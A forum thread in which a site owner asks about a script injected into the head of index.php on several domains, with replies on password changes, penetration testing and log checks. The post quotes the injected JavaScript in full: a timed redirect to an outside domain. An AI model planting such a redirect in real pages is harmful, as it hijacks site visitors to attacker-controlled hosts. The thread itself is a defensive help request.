Malicious code injection

I have found that there is some redirection code get injected on my server index.php


<script>
         setTimeout(function(){
            window.location.href = 'http://deloplen.com/afu.php?zoneid=2818299';
         }, 5000);
      </script>

I have checked date and time and it was not updated. My server team inform me that your page has some vulnerability that’s why it happened.
It happened for all the domain and code get injected before end of head tag.

Does it really happened by any malware.If it true then let me know.

What are the different technique to check code vulnerability ?

You should at least change all related passwords. But if this malware is on your PC, you have to completely reset that too. And you should make a Penetration Test on the software running on that server. And check the access logs of your webserver. There are many attack vectors.

Thank you.

Your server team need to be more forthcoming. What vulnerability? How do you correct the vulnerability? How do they know it’s a vulnerability in your code and not a penetration of their webserver?

“You’ve got some vulnerability” = “We can’t be bothered to help you, your code must be weak.”

This topic was automatically closed 91 days after the last reply. New replies are no longer allowed.